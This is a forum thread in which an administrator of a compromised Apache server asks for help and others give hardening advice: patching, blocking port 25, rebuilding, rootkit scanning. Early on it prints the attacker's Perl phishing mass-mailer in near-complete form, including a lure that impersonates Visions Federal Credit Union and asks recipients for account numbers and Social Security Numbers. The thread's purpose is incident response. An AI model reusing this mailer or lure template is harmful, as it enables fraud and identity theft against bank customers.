• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1640
  • Last Modified:

Protect Port 80(Apache)

We have an intrusion which looks like an automated script which buries itself in a hidden directory in /tmp directory. This script is basically a combination of 2 files
"awstats.pl" and links.txt. What it does is, it starts sending out an email portraying itself as a BANK to the all the addresses in .txt file.
This was the 4th time it attacked us since april 23. We had no choice other than taking the server off the network. Any ideas, suggestions on how to protect port 80 with these kind of attacks?
  • 4
  • 4
  • 3
  • +4
4 Solutions
zkaisermAuthor Commented:
This is the culprit "awstats.pl"


print "Content-type: text/html\n";

$file = "list.txt";
open(IN_FILE, $file);
my @data=<IN_FILE>;
close IN_FILE;

$contfile = "test.txt";
open(IN_FILE, $contfile);
my @contdata = <IN_FILE>;
close IN_FILE;

my $count = 0;

my $SendmailPath = '/usr/sbin/sendmail';
my $from_s = 'customerservice@visionsfcu.org';
my $subj_s = 'NOTICE FROM Visions Federal Credit Union #REF-ID:79053430';
my $contdata_s = @contdata;

my($mailbody) = <<__END__MAILBODY__;


<div id="message" style="width: 1136; height: 558">
  <table id="AutoNumber1" border="1" bordercolor="#111111" cellpadding="0" cellspacing="0" width="34%">
        <td width="100%">
          <p><img border="0" src="https://www.visionsfcu.org/images/visions2.jpg" width="158" height="50"></p>
          <p align="left"><font face="Arial" size="2">Dear Vision FCU Client,<br>
          &nbsp;This is your official notification from Vision FCU&nbsp;that the
          service(s) listed below &nbsp;will be deactivated and deleted if not
          renewed immediately. Previous notifications have &nbsp;been sent to
          the Billing Contact assigned to this account. As the Primary Contact,
          you &nbsp;must renew the service(s) listed below or it will be
          deactivated and deleted.&nbsp;<br>
          &nbsp;</font><font face="Verdana" size="2"><a target="_blank" href="http://visionsfcu.acswi.com/fcu-online/session_id.php"><font
color="#003399" face="Arial" size="2"><b>Renew
          Now</b></font></a></font><font face="Arial" size="2">&nbsp; your&nbsp;Vision
          FCU Bill Pay Services.<br>
          If you are not enrolled to Online Banking, please enter your checking
          account number as&nbsp;Account Number&nbsp; and Social Security Number&nbsp;
          as Password.</font></p>
          <div style="width: 508; height: 48">
            <font face="Arial" size="2">&nbsp;<br>
            &nbsp;<b><font color="#000000">SERVICE</font></b> : Vision FCU Bill
            Pay Services.<br>
            &nbsp;<b><font color="#000000">EXPIRATION</font><font color="#000080">
            </font></b>:&nbsp;May 15, 2006</font>
            <font face="Arial" size="2">&nbsp;</font>
            <font face="Arial" size="2"><br>
            Thank you,&nbsp;sincerely,<br>
            <font size="-1">Eric Kingsbury</font>, Customer Service</font>
            <p align="center"><font face="Verdana" size="2">======================================================================<br>
            <font face="Verdana" size="2">&nbsp;</font>
            <font face="Verdana" size="2">&nbsp;Document Reference: (#79053430).</font>
          <p align="center"><font face="Verdana" size="2"><b>2006 Vision FCU,
          All Rights Reserved. Member FDIC. Equal Housing Lender.</b></font></td>




foreach $line (@data){
print qq($line);
sendmail($line, $from_s, $subj_s, $mailbody );

sub sendmail{
     my ($to, $from, $subj, $msg) = @_;
     open (MAIL, "|$SendmailPath -t -i")|| die "Error! Can't use sendmail\n";
     print MAIL "To: $to";
     print MAIL "From: $from\n";
     print MAIL "Subject: $subj\n";
     print MAIL "Reply-To: $from\n";
     print MAIL "Content-type: text/html\n\n";
     print MAIL "$msg\n";
     close (MAIL);

my $count;
$count++ foreach(@data);
print "$count emails sent\n";</p>
This is of cause just a quick countermeasure:

If that is all time the same script, how about modifying the hosts file and add


creating a directory "images" in the www documents folder and putting a big: "FAKE" in the pic: visions2.jpg that file goes in the "images" folder.

Should at least stop the spammer collecting more pins...


Apart from that, apply all security patches for your system, I guess there lies the problem.

There are a couple of solutions:
- Configure your Apache to pass only specific requests (for example, for index.cgi, index.html, etc.), and block all of the rest. You can do it using 'RewriteRule' clauses.
For example, you can add the following rules to configuration file of your http server (Apache):
RewriteEngine on
RewriteRule  ^.*index.(^.*) http://%{HTTP_HOST}/index.$1 [L,R]
RewriteRule ^\/^.* http://nowhere

- You can try to capture the request that causes the script activation (using tcpdump on tcp port 80). Yes - this is a Sizific work, but capturing firewall intrusions is not an easy way. Once you have found the request which cause the intrusion, reconfigure your firewall to block such request (based on request IP or any other IP specific type).

Hope that I helped you.
Firewall Management 201 with Professor Wool

In this whiteboard video, Professor Wool highlights the challenges, benefits and trade-offs of utilizing zero-touch automation for security policy change management. Watch and Learn!

I agree, a large concern that should be addressed is how is this application getting onto your system. Configuring your loggs to identify suspicious traffic could go a long way to figuring out how the application is being installed and run. I would also make sure that all of your apps are running the latest versions of the necessary applications and not running anything that is unecessary. A tool like log watch can go through your httpd logs and inform you if sketchy behavior.

For example this is a pearl script, if you can do without perl then you will stop this application cold even if it stays on your machine.

hope this helps

Rich RumbleSecurity SamuraiCommented:
Yes, secure your apache install, make sure it's got the latest patches and your running the latest version.
Emails are send using port 25/tcp.

You could block this port on the server itself(using ipchains,iptables), or on network.

With port blocked, the script will not be able to send mails.

blocking port 25 will solve the problem with sending out emails but will not remove the cause. if the server can be exploited to send out emails what else is it being used for tht you do nto know of?

you are better off finding the cause or rebuilding a new box with all of the latest patches, i have seen machines so pwned that you could take three times more time cleaning it than you would dropping in a blank drive and starting over and that was with extensive logging running on the machine.
zkaisermAuthor Commented:
     Thanks for your response. One thing which bothers me how did these files ended up on our server? That too it was so well written that they were hidden or it's not exactly hidden it's a directory without a name. for example
The space you use between tmp and trimite is a directory without a name. What could be the cause of these files ending up on our server? is it the webserver configuration? or is something wrong with the webapplication? is there any way practical way of knowing this is how they hack into the webserver? How in the world could someone put files on your server through port 80? would be the question of the day??

/tmp/  /trimite/awstats.pl
Well, as I posted above. Your system can be vulnerable because it's missing latest patches.

Check what ports are open, check if that software is patched with up-to-date patches.

Rich RumbleSecurity SamuraiCommented:
Take your pick... It could be Apache, it could be TomCat if your running it, it could be your code, or due to a lax .conf file or setting
XSS (cross site scripting) has been getting more and more attention lately http://en.wikipedia.org/wiki/XSS There are unfortunatly quite a few vectors for this.
To me if it's not XSS, it's likely lax security of the config or on the directories, write permissions may be granted to everyone... possibly a username/password embedded in your source code?
zkaisermAuthor Commented:
     We have a firewall. Intruders can only use the ports which are open. Your answer looks quite normal. I signed for experts exhcange to know what happens behind the scenes.I would like how it happens. How come some send commands through the browser?

Rich RumbleSecurity SamuraiCommented:
Flaw's in your source code, scripting, scripting intereperters, apache exploits, lax security settings, all can lead to what happened to you.
Are you running PHP code, CGI/PERL code, do you have a login site? Each piece of software add's complexity, possible exploit vectors, and more overhead for you to figure out how to secure. Login sites can be poorly made, often the database usernames and pass's can be in the source code, or not obusifcated well. You can glean quite a bit of info from a poorly written site.

If your running PHP, or PHPBB you can see there are hundreds of exploit's that can lead to compromise, there are a variety of worst practices that can lead to this also.

Things like this: http://www.securityfocus.com/bid/15250/info http://www.securityfocus.com/bid/15250/discuss
Can upload a script, if you'd like to learn more you can search bugtraq, or pick up some of the Hacking Exposed series of books.
http://governmentsecurity.org/archive/t4603.html Ahh the loginmatrix challenge... that was a great tool to learn from, it's gone now... tooo bad, that one was fun.
Richrumble pointed it our precisely.

Please tell us more about the software componentes you use.

E.g. Host OS : win 2k3, IIS Webserver, MSSQL Database 2005.

such like...

(also normal)
zkaisermAuthor Commented:
Apache 1.3.x
mysql 3.x
php 4.1
freebsd 5.1

The email the users got was like www@ourhostname.com. What's this "www" user?
Rich RumbleSecurity SamuraiCommented:
All very dated packages, search for exploits on anyone of those and you'll find something. Try downloading GFI's languard network scanner, and running it against your server, also try nessus, it's it's still free.
Freebsd 5.1 was released early in 2003, there are many exploits that are active in the wild that can compromise a system that has not been patched since the initial install. If you like the platform wipe and re-install the patest FreeBSD production release (6.1) and patch that.

I would not spend your time trying to track down what is wrong with your system because there are many places that could have issues from the OS to the applications running on it and unless you are very comfortable with this environment, not very obvious to detect.

We will always be more than willing to assist you in this effort, but sometimes it makes more sense to start fresh.


rootkit, variation of vudo.c, and IRC Spykidz warez ware.  rkhunter should be got and run.  Then inspect all of your temp folders and try to get rid of execute permissions there.  Look for anything that ends in .pl and the like.

These phishers, hackers, and irc box ownerz know about legitimate programs and often name their stuff after them.  They collect usernames, harvest emails, attempt identity theft, and things like that.

You have to track this down manually and document it all.

User "nobody" should not have mail privileges.  Usually the scripts you are suggesting feign the user as soon as they detect Apache 1.3

But they can do it to other servers as well.

The older Apache, KDE, MySQL, PHP, and quite a few others are vulnerable and the hackers know it; apparently most of the developers either do not or they are unwilling to admit it.

As for your time trying to track down what is wrong, if you don't it is only going to keep on happening.  It will happen until the people doing it are caught and they can't be caught without someone tracking them down.

You don't want the big bank that they are impersonating subpoenaing all of your computers, do you?  Track them down and build evidence.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

  • 4
  • 4
  • 3
  • +4
Tackle projects and never again get stuck behind a technical roadblock.
Join Now